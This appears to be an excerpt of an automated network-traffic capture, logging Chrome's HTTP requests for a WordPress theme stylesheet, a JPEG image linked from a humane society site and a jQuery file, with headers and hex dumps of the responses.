                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC751INData Raw: 2f 2a 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 54 68 72 69 76 65 20 54 68 65 6d 65 20 42 75 69 6c 64 65 72 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 73 3a 2f 2f 74 68 72 69 76 65 74 68 65 6d 65 73 2e 63 6f 6d 2f 0a 41 75 74 68 6f 72 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 72 69 76 65 74 68 65 6d 65 73 2e 63 6f 6d 22 3e 54 68 72 69 76 65 20 54 68 65 6d 65 73 3c 2f 61 3e 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 54 68 72 69 76 65 20 54 68 65 6d 65 20 42 75 69 6c 64 65 72 20 6c 65 74 73 20 79 6f 75 20 76 69 73 75 61 6c 6c 79 20 64 65 73 69 67 6e 2c 20 62 75 69 6c 64 2c 20 65 64 69 74 20 61 6e 64 20 63 75 73 74 6f 6d 69 7a 65 20 65 76 65 72 79 20 61 73 70 65 63 74 20 6f 66 20 79 6f 75 72 20 57 6f 72 64 50 72 65 73 73 20 77 65 62 73
                                                                                                                                                                                                                                                        Data Ascii: /*Theme Name: Thrive Theme BuilderTheme URI: https://thrivethemes.com/Author: <a href="https://thrivethemes.com">Thrive Themes</a>Description: Thrive Theme Builder lets you visually design, build, edit and customize every aspect of your WordPress webs
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 30 2c 31 30 2c 2e 38 35 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 62 6f 64 79 3a 6e 6f 74 28 2e 64 65 66 61 75 6c 74 73 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 70 2c 6c 69 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 71 2c 70 72 65 2c 63 6f 64 65 2c 6b 62 64 2c 73 61 6d 70 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 30 2c 31 30 2c 31 30 2c 2e 38 35 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35
                                                                                                                                                                                                                                                        Data Ascii: 0,10,.85);font-size:1rem;line-height:1.5}body:not(.defaults){background:#fff;margin:0;padding:0}*,*:before,*:after{box-sizing:inherit}p,li,blockquote,q,pre,code,kbd,samp{color:rgba(10,10,10,.85);font-family:Arial,sans-serif;font-size:1rem;line-height:1.75
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 61 72 67 69 6e 3a 35 70 78 20 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 32 70 78 20 73 6f 6c 69 64 20 23 63 63 63 7d 62 6c 6f 63 6b 71 75 6f 74 65 3a 62 65 66 6f 72 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 3a 61 66 74 65 72 2c 71 3a 62 65 66 6f 72 65 2c 71 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 7d 62 6c 6f 63 6b 71 75 6f 74 65 3e 70 2c 71 3e 70 7b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: argin:5px 0;border-left:2px solid #ccc}blockquote:before,blockquote:after,q:before,q:after{content:""}blockquote>p,q>p{font:inherit !important;line-height:inherit !important;color:inherit !important;border:0 !important;padding:0 !important;margin:0 !impor
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 69 73 61 62 6c 65 64 5d 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 69 6e 70 75 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d
                                                                                                                                                                                                                                                        Data Ascii: isabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 79 70 65 3d 77 65 65 6b 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 74 69 6d 65 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 74 69 6d 65 2d 6c 6f 63 61 6c 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 63 6f 6c 6f 72 5d 2c 74 65 78 74 61 72 65 61 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 3a 66 6f 63 75 73 2c 69 6e 70 75
                                                                                                                                                                                                                                                        Data Ascii: ype=week],input[type=time],input[type=datetime],input[type=datetime-local],input[type=color],textarea{border:1px solid #ccc;border-radius:3px;padding:10px}input[type=text]:focus,input[type=email]:focus,input[type=url]:focus,input[type=password]:focus,inpu
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 74 63 62 2d 70 6f 73 74 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 2e 74 63 62 2d 70 6f 73 74 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 2c 2e 74 63 62 2d 70 6f 73 74 2d 63 6f 6e 74 65 6e 74 20 70 2e 68 61 73 2d 68 75 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 32 70 78 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 68 61 73 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 70 61 64 64 69 6e 67 2d 6c 65 66 74 20 2e 34 32
                                                                                                                                                                                                                                                        Data Ascii: -font-size{font-size:20px}.tcb-post-content p.has-large-font-size{font-size:36px}.tcb-post-content p.has-larger-font-size,.tcb-post-content p.has-huge-font-size{font-size:42px}body.theme-has-off-screen-sidebar{position:relative;transition:padding-left .42
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 3d 6c 65 66 74 5d 2e 76 69 73 69 62 6c 65 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 5b 64 61 74 61 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 74 79 70 65 3d 70 75 73 68 5d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 2d 73 69 7a 65 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 68 61 73 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 5b 64 61 74 61 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 3d 6c 65 66 74 5d 2e 76 69 73 69 62 6c 65 2d 6f 66 66 2d 73 63 72 65 65 6e 2d 73 69 64 65 62 61 72 20 2e 73 69 64 65 62 61 72 2d 73 65 63 74 69 6f 6e 7b 6c 65 66 74 3a 30 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 68 61 73 2d 6f 66 66 2d 73 63 72
                                                                                                                                                                                                                                                        Data Ascii: -off-screen-side=left].visible-off-screen-sidebar[data-off-screen-type=push]{padding-left:var(--off-screen-sidebar-size)}body.theme-has-off-screen-sidebar[data-off-screen-side=left].visible-off-screen-sidebar .sidebar-section{left:0}body.theme-has-off-scr
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 61 79 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 37 29 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 61 64 6d 69 6e 2d 62 61 72 20 23 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 33 32 70 78 29 7d 23 77 72 61 70 70 65 72 20 2e 68 69 64 65 2d 73 65 63 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 62 6f 64 79 3a 6e 6f 74 28 2e 74 68 72 69 76 65 5f 73 68 6f 77 5f 68 69 64 64 65 6e 5f 65 6c 65 6d 65 6e 74 73 29 20 23 77 72 61 70 70 65 72
                                                                                                                                                                                                                                                        Data Ascii: ay-color: rgba(0, 0, 0, .7);margin:0;padding:0;position:relative;display:flex;flex-direction:column;min-height:100vh}.admin-bar #wrapper{min-height:calc(100vh - 32px)}#wrapper .hide-section{position:relative}body:not(.thrive_show_hidden_elements) #wrapper
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 61 69 6e 2d 63 6f 6e 74 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 38 30 70 78 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 6c 61 79 6f 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 77 69 64 74 68 29 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 7a 2d 69 6e 64 65 78 3a 30 7d 2e 74 68 65 6d 65 2d 73 65 63 74 69 6f 6e 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 31 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f
                                                                                                                                                                                                                                                        Data Ascii: ain-content-background{height:100%;width:1080px;width:var(--layout-background-width);max-width:100%;position:absolute;top:0;overflow:hidden;margin:0;padding:0;z-index:0}.theme-section{flex-shrink:1;position:relative;margin:0;padding:0;box-sizing:border-bo
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 6e 74 2d 73 65 63 74 69 6f 6e 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6f 72 64 65 72 3a 31 3b 77 69 64 74 68 3a 63 61 6c 63 28 37 30 25 20 2d 20 31 30 70 78 29 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 76 61 72 28 2d 2d 73 69 64 65 62 61 72 2d 73 69 7a 65 29 20 2d 20 76 61 72 28 2d 2d 73 65 70 61 72 61 74 6f 72 2d 73 69 7a 65 29 2a 2e 35 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 2e 63 6f 6e 74 65 6e 74 2d 66 75 6c 6c 2d 77 69 64 74 68 7b 77 69 64 74 68 3a 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 69 64 65 62 61 72 2d 73 65 63 74 69 6f 6e 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6f 72 64 65 72 3a 33 3b 77 69 64 74 68 3a 63 61 6c 63 28 33 30 25 20 2d 20 31 30 70 78 29 3b 77 69 64 74 68 3a
                                                                                                                                                                                                                                                        Data Ascii: nt-section{flex-grow:1;order:1;width:calc(70% - 10px);width:calc(100% - var(--sidebar-size) - var(--separator-size)*.5) !important}.content-section.content-full-width{width:100% !important}.sidebar-section{flex-grow:1;order:3;width:calc(30% - 10px);width:


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        7192.168.2.44975713.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC622OUTGET /photos/352/c74a3261-0887-4eef-a819-4790e9521a1b.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC562INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 104868
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 22:59:02 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD30380B36B94D
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: 1e205e80-f01e-0010-7a36-620df7000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015909Z-156796c549bsd9wdhC1EWRzydn00000015n0000000002um9
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache-Info: L2_T2
                                                                                                                                                                                                                                                        X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC15822INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 0b 8b 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 12 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 0f 01 02 00 06 00 00 00 b6 00 00 00 10 01 02 00 0e 00 00 00 bc 00 00 00 1a 01 05 00 01 00 00 00 ca 00 00 00 1b 01 05 00 01 00 00 00 d2 00 00 00 31 01 02 00 07 00 00 00 da 00 00 00 32 01 02 00 14 00 00 00 e1 00 00 00 3c 01 02 00 0e 00 00 00 f5 00 00 00 1a 01 05 00 01 00 00 00 03 01 00 00 1b 01 05 00 01 00 00 00 0b 01 00 00 69 87 04 00 01 00 00 00 13 01 00 00 25 88 04 00 01 00 00 00 62 0a 00 00 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 35 20 50 72 6f 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 31 37 2e 36 2e 31 00
                                                                                                                                                                                                                                                        Data Ascii: JFIFHHExifII*(12<i%bAppleiPhone 15 ProHH17.6.1
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC16384INData Raw: a2 df c3 16 1e 2f 84 5a 42 24 c9 cb e3 1c d7 d3 60 b3 1a 92 56 a8 b5 3c bc 46 11 2d 62 f4 3c 6e c6 ea 68 26 55 78 8a af b8 ae c1 a6 4b 9b 05 38 07 15 af e2 6b 5b 03 a7 2c b6 76 cd 19 c6 49 c7 73 5c 0c 17 5e 5c 4f 92 54 f4 af 4d 62 15 b9 99 c7 c8 d3 b1 ba b2 08 ed cc ca e5 70 48 e0 d5 fb 5d 56 19 22 f2 a4 c3 67 8c 1a e7 2d 6f 22 98 bc 4d 20 21 b8 38 3d 2b 1f 52 b7 b9 b1 d4 12 68 24 2f 11 39 18 a9 f6 d1 9f bf 11 eb 1d 19 e9 9a 66 ad 3e 8d ab 0b b8 49 8d 7a f0 71 5c df c4 af 8a eb a5 f8 3f 51 d7 b5 ab 82 96 56 70 97 61 bb af a0 fc 6a a4 b7 ad 37 86 51 d8 62 45 1c 92 2b f3 cf f6 a5 f8 81 3f f6 85 bf 86 ed 66 69 b4 fb 65 2f a8 22 b6 04 8c 7e ea 9f a0 e6 be 77 89 f3 1a 58 4c 3b ac 97 be f4 47 a9 93 e1 a7 88 ab ec 9f c3 bb 3c 72 f7 53 f1 0f c6 2f 8d 97 da d5 d9
                                                                                                                                                                                                                                                        Data Ascii: /ZB$`V<F-b<nh&UxK8k[,vIs\^\OTMbpH]V"g-o"M !8=+Rh$/9f>Izq\?QVpaj7QbE+?fie/"~wXL;G<rS/
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC16384INData Raw: 58 d9 96 2e 6e 90 42 d2 09 8a a2 06 52 09 e7 8f f0 af 3b d7 2f 7c b8 26 85 26 0e 4b 90 85 32 76 f2 32 3f c3 d3 a7 6a f3 7f 12 7c 50 d3 74 1d 2b 54 d5 b5 0b f8 e1 b1 b6 b8 19 d8 4f cb c0 0d 95 ee 00 e0 81 c8 20 1e fc 7c e3 e2 cf 8e b0 2e ad a8 41 a5 dc b5 dc 49 72 60 92 15 95 44 91 be c0 ea f1 8c fc c3 b1 1f c5 c8 fa f9 eb 05 39 4f 53 be 15 14 55 c5 f8 d7 ab db 05 b4 49 0c 8d 10 bc d9 39 54 f9 10 bc 6e 54 91 fc 38 7e 00 e8 4b 01 5f 9d 5f 12 bc 48 a3 c5 71 ed 90 cc f7 19 32 b2 0d a2 3d bb 58 e3 db e6 24 7d 2b e8 4f 8b 7e 37 9e 5b e6 4f ed 8b 4b 74 b8 e6 1b 9f b4 8d af 18 31 c8 8d 83 d4 ab c7 9c 1e 4e 18 10 32 71 f9 b1 f1 27 c4 53 c3 73 76 18 44 93 5c 03 94 59 b2 bb 54 86 59 17 92 08 ce f5 fa 67 3c 8a fb 1c b2 11 a7 0d 4f 1b 18 dc e4 78 cf 89 75 db c9 fc 45
                                                                                                                                                                                                                                                        Data Ascii: X.nBR;/|&&K2v2?j|Pt+TO |.AIr`D9OSUI9TnT8~K__Hq2=X$}+O~7[OKt1N2q'SsvD\YTYg<OxuE
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC16384INData Raw: f2 40 c7 1c 1c d7 2d ad 5b 99 6f 41 c0 65 cf cc 84 f6 f5 e6 ba b3 13 00 23 90 16 db e9 c8 c7 ad 52 b9 86 21 10 70 76 46 a7 ef 02 49 ff 00 3e d5 12 95 91 a5 35 76 62 d9 da 24 39 79 17 6e 46 62 91 4f 07 f2 ad 31 21 7d 8f 26 77 05 07 39 ea 3f ad 62 cf 27 9b 76 3c 81 b5 77 64 15 fb ae 6b 76 c9 09 68 89 43 b3 23 e4 60 09 06 bc d9 d5 bb 3a e3 14 8b 8d 34 1a 76 8b 36 a3 31 da 91 29 3f 8f 61 5e 19 ab c2 f7 ba ae d7 49 d5 66 1b c3 3f 1b 89 ef 5d cf 8b f5 d8 05 f1 d0 95 b1 e5 af 99 36 de 06 71 95 15 c8 d8 ea cd a8 40 5e fa 68 e2 48 13 09 91 ce 3b 62 be 7f 31 ac a7 3e 55 d0 f5 70 74 b9 63 cc fa 91 4b e1 cb 81 a3 41 73 05 c1 37 88 41 46 ee bc d6 cd dd 96 b3 a8 dc 8b 89 b5 23 73 18 87 6b a6 07 a7 5c 0e d5 6e 3f b4 8b 02 d0 4b 99 64 23 6a 1e e3 d6 aa 69 da 1d e4 1a 8b
                                                                                                                                                                                                                                                        Data Ascii: @-[oAe#R!pvFI>5vb$9ynFbO1!}&w9?b'v<wdkvhC#`:4v61)?a^If?]6q@^hH;b1>UptcKAs7AF#sk\n?Kd#ji
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC16384INData Raw: 69 1c b2 24 9e 59 39 cb 7f 08 f4 aa b0 ea 53 4f 14 1e 69 02 56 52 1c fa 7b fe 35 d1 de 5c d9 be 80 16 65 0e 48 2c e3 18 cb 67 8c 7e 15 ca 69 b6 b2 5f f8 b6 dc 2c 4d f6 76 60 1d f1 d3 14 d1 37 d6 c7 43 05 b0 d5 ec b9 5c 46 8d b5 55 8f 50 3a e2 ba eb 6d 56 cb 4e d0 45 84 f1 88 0a e4 2a 8c 28 22 a3 d4 d2 d3 40 d2 a4 f2 27 47 98 0d f8 51 9f c2 bc 1f 5e 97 c4 fa c6 b7 f6 a8 62 c4 3d 11 8f 18 aa 4a ea e3 be b6 3d 2e 6b 48 c6 a7 25 c5 b8 79 6d 9d b2 ca a7 1d 7b 53 6d 27 89 b5 f1 e4 62 14 53 f3 ee e3 70 f4 a5 f8 6f 77 7b 6f 6f 77 69 ac a2 b3 94 f9 64 7e 70 6b 75 3c 3a 9a 9f f6 85 ed 84 f1 bc c8 08 c2 f6 15 0f b1 68 f4 bf 87 9e 18 b9 f1 d4 d7 56 16 b3 db 58 da 46 3f d2 6f ae 1b 6a a2 e6 be cd d7 fe 08 6b f7 7f b3 6a 49 e0 ed 4f c3 fe 28 4b 3b 62 62 b1 86 f0 a4 b3
                                                                                                                                                                                                                                                        Data Ascii: i$Y9SOiVR{5\eH,g~i_,Mv`7C\FUP:mVNE*("@'GQ^b=J=.kH%ym{Sm'bSpow{oowid~pku<:hVXF?ojkjIO(K;bb
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC16384INData Raw: 07 34 35 24 ae 81 34 dd 99 f6 c7 ec b9 e3 8b 9f 10 fc 2f 87 4c d6 2e 10 dd 5b e1 54 77 db d8 d7 d1 da dc f1 c0 ce 43 70 38 04 1e b5 f8 e1 e0 df 89 da ef c3 9f 89 72 c3 68 1b c9 47 c3 a9 ee 01 af d1 5f 01 f8 f2 d7 e2 6f 83 7e d1 3d c3 58 cd 8c 65 5b 9c fa d6 91 5c da 98 38 f2 b3 ae bd 79 ae 92 51 10 dc 0f 5e 6b e1 9f 8c 36 97 36 bf 16 ef de d2 69 ed ca da 23 b3 23 7c a0 e4 f2 47 e5 5f 5c df c1 e2 1f 09 df 3c c9 30 d4 ec 1c f7 3c e2 be 60 f8 93 13 6a be 28 d6 2f 8c 45 55 ac 00 24 b6 0a 9c f4 f7 af 27 39 a7 28 52 52 f3 fd 0f d4 bc 29 84 6b 66 92 8f f7 7f f6 e4 79 8d 8f 8b 75 19 b5 6b 05 d6 63 f3 da 39 10 24 f0 9c 12 07 f7 87 6a f9 33 f6 c4 f1 84 97 9f b5 37 80 b4 7b fb c6 b6 d1 4d ab bf 9a 0e 41 62 00 00 9e f5 f4 91 b1 ba 83 57 84 f3 1b 0c 6e 24 71 b7 fa d7
                                                                                                                                                                                                                                                        Data Ascii: 45$4/L.[TwCp8rhG_o~=Xe[\8yQ^k66i##|G_\<0<`j(/EU$'9(RR)kfyukc9$j37{MAbWn$q
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC7126INData Raw: b4 19 3a 23 31 ce 31 f5 ab 94 a2 a0 da df a1 29 49 cd 2e 9d 4e 02 e3 e1 56 97 67 e2 6d 77 51 d4 ad 17 67 fa ab 70 46 39 ef 9c d4 3a 17 c3 0d 02 d7 e1 b5 dd f7 88 e1 11 79 f3 84 b7 70 b8 5e fd ab d1 ee 6e 5f 5b ba 9e 7b bb d6 95 65 66 95 63 63 f7 97 71 6d a4 7b 74 a4 bc 36 9e 33 f8 68 4c d3 34 13 d9 4f fb 8b 64 62 0b 80 73 cf e2 2a a3 56 a7 56 4b 50 7d 0f 93 6f fe 1b a5 cf 8d 24 b3 d2 d9 82 16 04 c6 39 ca 93 fa 71 cd 49 ac f8 0a eb 45 d3 5a de 45 21 03 7e ec cb d4 1e 95 f5 0e 83 a2 ac fe 26 9a 49 52 3b 1b c5 84 05 e7 2c c4 7a 67 d6 ab 6b 9a 64 1e 20 f3 17 53 9c 5b cf 6e 4a 65 40 02 53 d3 8f af 15 db 43 31 ab 4e 4b 5b a3 9e ae 12 13 5d 99 f1 c4 9e 0f d6 34 9b c1 35 e6 9c 44 6c 37 87 8f e6 dc 3d 78 ac 7d 5a 69 2f 2e 92 57 8d a3 82 26 00 e4 10 4d 7e 98 7c 3a
                                                                                                                                                                                                                                                        Data Ascii: :#11)I.NVgmwQgpF9:yp^n_[{efccqm{t63hL4Odbs*VVKP}o$9qIEZE!~&IR;,zgkd S[nJe@SC1NK[]45Dl7=x}Zi/.W&M~|:


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        8192.168.2.449759192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC572OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
